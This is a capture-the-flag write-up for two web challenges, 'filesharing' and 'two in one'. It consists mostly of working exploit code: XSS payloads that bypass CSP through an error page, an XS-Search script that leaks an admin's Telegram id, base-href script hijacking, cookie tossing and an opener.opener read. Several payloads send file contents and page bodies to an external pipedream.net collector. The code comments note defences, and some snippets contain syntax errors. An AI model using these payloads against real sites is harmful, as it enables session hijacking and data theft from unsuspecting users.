Sorry — I only wrote up the exploits and the scenarios because I didn't have enough time.
filesharing
#scenario
1. upload a JavaScript file
2. share it with the admin
3. XSS in /play
4. bypass CSP via the error page
5. inject a script into the error page
exploit.js
// exploit.js — the script stage of the "filesharing" chain, loaded into /play
// through the payload URL below. Left byte-identical; the trailing `"` on the
// last line looks like a paste artifact and makes the snippet a syntax error
// as written.
// Opens a same-origin window whose path is 4100 'x' characters long. Per the
// scenario above, the resulting error page is the one without the CSP that
// /play enforces (presumably an over-long URL produces a server error response
// that omits the header — confirm against the target's configuration).
a = window.open('/' + 'x'.repeat(4100));
setTimeout(function() {
// After 1 s the popup is assumed to have finished loading. Because it is
// same-origin, its document is writable from here; the injected handler reads
// a file from /upload/... and forwards the text to the attacker-side log
// endpoint. Mitigation: emit the CSP (and the other security headers) on
// error responses as well, not only on the normal application routes.
a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0lec.one/upload/ffffffffffffffffffffffffffffffff').then(x=>x.text()).then(x=>fetch('https://enllwt2ugqrt.x.pipedream.net/'+x))">`;
}, 1000);" // stray quote — not part of the script (see note above)
payload
https://filesharing.m0lec.one/play?xss=<script src="/upload/b56fe7aa9bac42d5b24d066807bb41a7"></script>
two in one
#scenario
1. leak the admin's Telegram id via an XS-Search attack (iframe)
2. send payload to telegram bot
3. bypass SameSite=Strict and get the flag using the opener.opener trick
xsleak.html
<!DOCTYPE html>
<html>
<head>
<title>exploit</title>
</head>
<body></body>
<script>
// Candidate alphabet for the character-by-character search: digits, both
// letter cases and `_`.
var chars='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_';
// Unused below: search() reads chars.length directly.
var charLen = chars.length;
// Unused below: search() builds the URL inline instead of from this constant.
var ENDPOINT = "https://telegrambotclient.m0lec.one/locations?search="
// Implicit global (no var/let). A popup onto the target origin that the leak
// loop re-navigates for every guess; this page keeps a handle to it, which is
// exactly the cross-origin reference a Cross-Origin-Opener-Policy header on the
// target would sever.
x = window.open('https://telegrambotclient.m0lec.one/locations?search=');
/**
 * Promise-based delay: resolves (with no value) after `t` milliseconds.
 * @param {number} t - delay in milliseconds, passed straight to setTimeout
 * @returns {Promise<void>}
 */
function sleep(t) {
  const scheduleWakeup = (resolve) => {
    setTimeout(resolve, t);
  };
  return new Promise(scheduleWakeup);
}
// One step of the XS-Search loop: appends chars[charCounter] to the prefix
// recovered so far, navigates the popup to the search URL for that guess, and
// uses the popup's frame count as the oracle. window.frames.length is one of
// the few properties a cross-origin document exposes, so a results page that
// renders an iframe only when the search matches leaks one guess per
// navigation.
// @param {string} leak - characters of the target value recovered so far
// @param {number} charCounter - index into `chars` of the character to try
async function search(leak,charCounter) {
var curChar = chars[charCounter];
console.log(curChar);
x.location = 'https://telegrambotclient.m0lec.one/locations?search=' + leak + curChar;
// Fixed 100 ms wait for the navigation to render. If the target is slower
// than that, the read below may still reflect the previous guess's document
// rather than fail outright.
await sleep(100);
if(x.window.frames.length != 0){
// Treated as a hit: report the extended prefix to the attacker-side log,
// then extend the prefix.
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://enllwt2ugqrt.x.pipedream.net/?cmd='+leak + curChar, true);
xhr.withCredentials = true;
xhr.send(null);
console.log("leak = " + leak + curChar);
leak += curChar
}
// Always continues with the next alphabet index (wrapping), so the loop never
// terminates on its own and, after a hit, only revisits earlier alphabet
// positions once it has cycled around. Defensive angle: the oracle disappears
// if the results page keeps the same frame structure whether or not the search
// matches, or if the target sets Cross-Origin-Opener-Policy so the opener's
// window reference is severed.
search(leak , (charCounter +1 ) % chars.length);
}
// Entry point: starts the leak from the prefix "y8ww" (presumably a part of
// the id already known or recovered in an earlier run — the page does not say)
// at alphabet index 0.
function exploit(){
search("y8ww",0);
}
// Beacon so the attacker-side log shows the page was opened by the victim
// (floating promise: its result and any rejection are ignored), then start.
fetch('https://enllwt2ugqrt.x.pipedream.net/?start');
exploit();
</script>
</html>
rdr.html
<!-- rdr.html: the page the bot is sent to through the report URL below.
     The first image points at a response with sleep=9000 in its query string,
     which looks intended to keep this document in its loading state for ~9 s
     so the window relationship created below stays alive — confirm against
     the httpstat.us semantics. -->
<img src=https://httpstat.us/200?sleep=9000>
<!-- The second image has a src that is not expected to resolve, so its
     onerror handler runs right away: it opens the target's /messages page in
     a named window "s" (this page thereby becomes that window's opener — the
     first link of the opener.opener chain in the scenario) and pings the
     attacker-side log. -->
<img src=x onerror="
let s=window.open('https://telegrambotclient.m0lec.one/messages','s')
fetch('https://enllwt2ugqrt.x.pipedream.net/?start=start')
">
/static/js/popper.min.js
// Replacement for /static/js/popper.min.js, served from the attacker's host
// once the <base href> payload listed below makes the target's relative script
// URLs resolve there (the page does not show where that payload lands —
// presumably via the Telegram-bot route from step 2). Runs only in the
// /messages window that rdr.html opened. Note: the `if` block is never closed
// in this listing — a `}` is missing.
if(document.location.href=="https://telegrambotclient.m0lec.one/messages"){
// Same long-path trick as exploit.js: a 4100-character path on the target
// origin, whose error page the scenario says lacks the CSP of the normal pages.
a = window.open('https://telegrambotclient.m0lec.one/' + 'x'.repeat(4100));
setTimeout(function() {
// 300 ms later the same-origin error page is rewritten. The injected handler
// drives note.m0lec.one from a sibling subdomain: it logs the bot out, writes a
// `session` cookie scoped to `domain=m0lec.one` (a parent-domain cookie, so
// note.m0lec.one receives it too — "cookie tossing"), then opens note?id=2
// several times; those windows have this error page as their opener.
// Mitigation on the note app's side: a `__Host-` prefixed session cookie cannot
// carry a Domain attribute, so a sibling subdomain cannot plant one.
a.document.body.innerHTML = `<img src=x onerror="setTimeout(function(){window.open('https://note.m0lec.one/logout');},700);setTimeout(function(){ document.cookie='session=.eJwljjFuQzEMQ-_iuYMs27KUy3xIloQEBVrg_2Qqeve46MCBBPjIn3LkGde93J7nKz7K8fByK0zObJALYCSSpiqaYyMeIn1CLBECYBLLSVFFKyUs4WUdgXpdtZlxM00CaqBbgNbrBpiGcwVI4U3NGVmTjBACp7o7kmHZR15XnP9v-rbrOvN4fn_G1w6Gx1-38d7ZxI5zgOpAwDFF6kSHEMgsv2-Y5j5D.YaomgA.58rKF-PLOJEKpL0BnaaZrpFx3to; domain=m0lec.one'},1700);setTimeout(function(){a= window.open('https://note.m0lec.one/note?id=2');},1900);setTimeout(function(){a= window.open('https://note.m0lec.one/note?id=2');},2100);setTimeout(function(){a= window.open('https://note.m0lec.one/note?id=2');},2300);setTimeout(function(){a= window.open('https://note.m0lec.one/note?id=2');},2500);setTimeout(function(){a= window.open('https://note.m0lec.one/note?id=2');},3000)">`;
}, 300);
// At 500 ms this window navigates itself to note?id=1. It is the opener of the
// error-page window `a`, so from the note?id=2 windows opened by `a` it is
// reachable as `opener.opener` — and by then it is same-origin with them.
setTimeout(function(){document.location = 'https://note.m0lec.one/note?id=1';},500);
/static/js/jquery-3.3.1.slim.min.js
// Replacement for /static/js/jquery-3.3.1.slim.min.js. Presumably executes in
// the note?id=2 windows opened above (assuming the <base href> payload also
// rewrote the note app's script URLs): their opener is the error-page window,
// whose opener is the former /messages window, now at note?id=1 — same origin
// as note?id=2, so its document is readable. Sends that document's URL and
// base64-encoded body to the attacker-side log (floating fetch, no catch).
// Defensive angle: Cross-Origin-Opener-Policy: same-origin on the note app
// severs the opener link when a cross-origin window navigates to it.
fetch('https://enllwt2ugqrt.x.pipedream.net/?aa='+opener.opener.document.location.href+'&x='+btoa(opener.opener.document.body.innerHTML))
payload
https://a.com/>a</a><base/href="https://ssrf.kr">
report
https://ssrf.kr/rdr.html